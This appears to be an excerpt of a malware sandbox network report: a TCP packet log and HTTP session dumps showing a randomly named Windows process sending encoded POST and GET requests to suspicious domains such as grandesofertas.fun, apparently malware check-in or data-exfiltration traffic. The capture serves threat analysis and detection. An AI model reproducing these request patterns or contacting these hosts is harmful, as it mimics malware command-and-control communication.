                                                                                  Nov 20, 2024 08:32:49.639800072 CET5000080192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:49.645191908 CET805000085.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:49.645256996 CET5000080192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:50.659231901 CET5000280192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:50.664490938 CET805000285.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:50.671235085 CET5000280192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:50.683286905 CET5000280192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:50.688251019 CET805000285.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:50.688342094 CET805000285.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:52.186642885 CET5000280192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:52.191823959 CET805000285.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:52.191899061 CET5000280192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.206095934 CET5000380192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.211122990 CET805000385.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:53.211208105 CET5000380192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.221496105 CET5000380192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.230283976 CET805000385.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:53.922540903 CET805000385.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:53.922594070 CET805000385.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:53.922705889 CET5000380192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.972852945 CET5000380192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.978199005 CET805000385.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:59.026654959 CET5000480192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:32:59.031667948 CET8050004103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:32:59.031852007 CET5000480192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:32:59.045275927 CET5000480192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:32:59.050292969 CET8050004103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:32:59.965503931 CET8050004103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:32:59.965563059 CET8050004103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:32:59.965615988 CET5000480192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:00.546185970 CET5000480192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:01.567184925 CET5000580192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:01.572335958 CET8050005103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:01.575268030 CET5000580192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:01.591272116 CET5000580192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:01.596267939 CET8050005103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:02.486272097 CET8050005103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:02.486644983 CET8050005103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:02.486694098 CET5000580192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:03.095184088 CET5000580192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:04.112373114 CET5000680192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:04.117574930 CET8050006103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:04.117645979 CET5000680192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:04.136784077 CET5000680192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:04.141733885 CET8050006103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:04.141892910 CET8050006103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:05.035121918 CET8050006103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.643045902 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.643088102 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.643099070 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.643201113 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.643222094 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.646379948 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.724703074 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.724715948 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.724726915 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.724872112 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.728060961 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.732964993 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:53.835887909 CET5002280192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:53.840821981 CET805002243.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:53.840919018 CET5002280192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:53.857135057 CET5002280192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:53.862019062 CET805002243.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:54.729610920 CET805002243.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:54.729873896 CET805002243.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:54.735361099 CET5002280192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:55.359285116 CET5002280192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:56.377084017 CET5002380192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:56.382258892 CET805002343.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:56.382359028 CET5002380192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:56.402523994 CET5002380192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:56.407475948 CET805002343.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:57.270441055 CET805002343.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:57.270477057 CET805002343.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:57.273456097 CET5002380192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:57.905668974 CET5002380192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:58.924757004 CET5002580192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:58.929796934 CET805002543.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:58.930423975 CET5002580192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:58.945770025 CET5002580192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:58.950727940 CET805002543.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:58.950790882 CET805002543.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:59.818623066 CET805002543.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:59.818676949 CET805002543.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:59.818741083 CET5002580192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:00.452409029 CET5002580192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:01.470998049 CET5002680192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:01.476167917 CET805002643.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:34:01.476300955 CET5002680192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:01.485373974 CET5002680192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:01.490386963 CET805002643.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:34:02.362343073 CET805002643.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:34:02.362405062 CET805002643.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:34:02.362520933 CET5002680192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:02.365196943 CET5002680192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:02.370049953 CET805002643.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:34:07.699291945 CET5002780192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:07.704334974 CET8050027103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:07.704575062 CET5002780192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:07.718615055 CET5002780192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:07.723602057 CET8050027103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:08.318742990 CET8050027103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:08.318764925 CET8050027103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:08.318850040 CET5002780192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:09.237731934 CET5002780192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:10.265521049 CET5002880192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:10.270762920 CET8050028103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:10.270863056 CET5002880192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:10.327864885 CET5002880192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:10.333784103 CET8050028103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:10.867294073 CET8050028103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:10.867333889 CET8050028103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:10.867578030 CET5002880192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:11.843204021 CET5002880192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:12.883373022 CET5002980192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:12.888386011 CET8050029103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:12.895359039 CET5002980192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:12.974217892 CET5002980192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:12.981096029 CET8050029103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:12.981232882 CET8050029103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:13.497000933 CET8050029103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:13.497258902 CET8050029103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:13.497498035 CET5002980192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:14.483707905 CET5002980192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:15.502130985 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:15.507204056 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:15.507317066 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:15.515158892 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:15.520925045 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:16.117191076 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:16.117252111 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:16.117292881 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:16.117357016 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:16.117434025 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:16.120456934 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:16.125334978 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:21.152332067 CET5003180192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:21.157260895 CET805003113.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:21.157596111 CET5003180192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:21.170445919 CET5003180192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:21.175338984 CET805003113.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:21.628746033 CET805003113.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:21.628823996 CET5003180192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:22.690650940 CET5003180192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:22.695611954 CET805003113.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:23.707329988 CET5003280192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:23.712619066 CET805003213.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:23.712747097 CET5003280192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:23.727310896 CET5003280192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:23.732351065 CET805003213.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:24.170502901 CET805003213.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:24.170562029 CET5003280192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:25.235325098 CET5003280192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:25.240416050 CET805003213.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:26.252783060 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:26.257862091 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:26.257926941 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:26.276673079 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:26.281653881 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:26.281723976 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:26.724602938 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:26.724767923 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:27.852417946 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.218393087 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.797204971 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:28.797249079 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:28.799371004 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.861366034 CET5003480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.866748095 CET805003413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:28.867429972 CET5003480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.879338980 CET5003480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.884496927 CET805003413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:29.347915888 CET805003413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:29.347978115 CET805003413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:29.348124981 CET5003480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:29.353565931 CET5003480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:29.358505964 CET805003413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:34.421104908 CET5003580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:34.425992966 CET805003513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:34.426058054 CET5003580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:34.441217899 CET5003580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:34.446190119 CET805003513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:34.899445057 CET805003513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:34.903506041 CET5003580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:35.952739954 CET5003580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:35.957832098 CET805003513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:36.971510887 CET5003680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:36.976547003 CET805003613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:36.976869106 CET5003680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:36.993566990 CET5003680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:36.999834061 CET805003613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:37.436126947 CET805003613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:37.436227083 CET5003680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:38.499450922 CET5003680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:38.505342960 CET805003613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:39.519345045 CET5003780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:39.524331093 CET805003713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:39.529381990 CET5003780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:39.543355942 CET5003780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:39.548275948 CET805003713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:39.548496008 CET805003713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:39.991364002 CET805003713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:39.991492033 CET5003780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:41.050168037 CET5003780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:41.055380106 CET805003713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:42.065563917 CET5003880192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:42.070652008 CET805003813.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:42.070733070 CET5003880192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:42.081414938 CET5003880192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:42.086386919 CET805003813.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:42.532031059 CET805003813.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:42.532068014 CET805003813.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:42.532171011 CET5003880192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:42.536000013 CET5003880192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:42.540899992 CET805003813.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:47.594947100 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:47.599852085 CET8050039172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:47.602602959 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:47.619359970 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:47.624313116 CET8050039172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:48.132668018 CET8050039172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:48.132721901 CET8050039172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:48.132791042 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:48.132853985 CET8050039172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:48.132906914 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:49.124407053 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:50.174752951 CET5004080192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:50.181282043 CET8050040172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:50.181377888 CET5004080192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:50.204757929 CET5004080192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:50.210535049 CET8050040172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:50.722913027 CET8050040172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:50.722997904 CET8050040172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:35:14.077846050 CET1.1.1.1192.168.2.60x849bNo error (0)www.nonpressure.beauty172.67.131.229A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49872 | 188.114.96.38 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:31:49.084477901 CET | 560 | OUT | GET /wbcb/?9xn=fHadNpk8MVax&GR54yHZ8=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K07oOsp/5ysfwWmAOXTj0WnbyU/nOpjct5usIHCkjfDMsHKGZFI= HTTP/1.1
Host: www.aziziyeescortg.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Nov 20, 2024 08:31:49.721586943 CET | 1101 | IN | HTTP/1.1 404 Not Found
Date: Wed, 20 Nov 2024 07:31:49 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jv1Yjc7qorQkIAKyPansiI5oqvUUETMy1uuq4ctnrDLXcEOcc2xNUxD0SYuCrqvz2Sp2MLN87KyiJYVwhTPeZ7RbXy7NDIbj5DCJSx45sg%2BUMXayoAC3rxjtgA2%2Fntdc3%2BhxwwSlqixg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e56be1a4d79c44f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1453&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=560&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: 13a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49966 | 76.223.74.74 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:04.926918983 CET | 828 | OUT | POST /5rfk/ HTTP/1.1
Host: www.grandesofertas.fun
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Length: 213
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Origin: http://www.grandesofertas.fun
Referer: http://www.grandesofertas.fun/5rfk/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8=hBRTXVZZoqfFQ4dlBafnbCC8FYV9NOX8zOBSyWnTDUCTknaMHmN2Z8uirvWLS2LqB8lV1Q6PLRChm0oVFPkytlla1GqcuWqS4xgKjWu6Mf9XlBI0RKQgpXKWkJ1LvW/M57fMEzp3linFZYqef09I8BaAD+kq9AARKE1xDUCM37EKV0a6herUHW5w4Tp2ysDkRJAuaM3xtBGF
Nov 20, 2024 08:32:05.409843922 CET | 456 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Nov 2024 07:32:05 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.grandesofertas.fun/5rfk/
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49986 | 76.223.74.74 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:07.473522902 CET | 852 | OUT | POST /5rfk/ HTTP/1.1
Host: www.grandesofertas.fun
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Length: 237
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Origin: http://www.grandesofertas.fun
Referer: http://www.grandesofertas.fun/5rfk/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8=hBRTXVZZoqfFRYtlH9DnKSC7J4V9DuX4zONSyVr5CguTkFCMdiZ2e8ui4vWOcWL1B8hd1RGPLVqhm0YVG+kxs1lY5mqSqWqS4xgKjW7fMf1Xkx40Rv8/3HKVz51LrW/I57fyE3JRlnjFZYaeemFLyBbJcOlt4h0UFksiAT6vnsJpQCHg9tr3VGZy4RxEyMDOTJ4uIb7Wi1jmMCzzEQoi2iFQDZZTl1wK8w==
Nov 20, 2024 08:32:07.970556974 CET | 456 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Nov 2024 07:32:07 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.grandesofertas.fun/5rfk/
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49987 | 76.223.74.74 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:10.020680904 CET | 1865 | OUT | POST /5rfk/ HTTP/1.1
Host: www.grandesofertas.fun
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Length: 1249
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Origin: http://www.grandesofertas.fun
Referer: http://www.grandesofertas.fun/5rfk/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
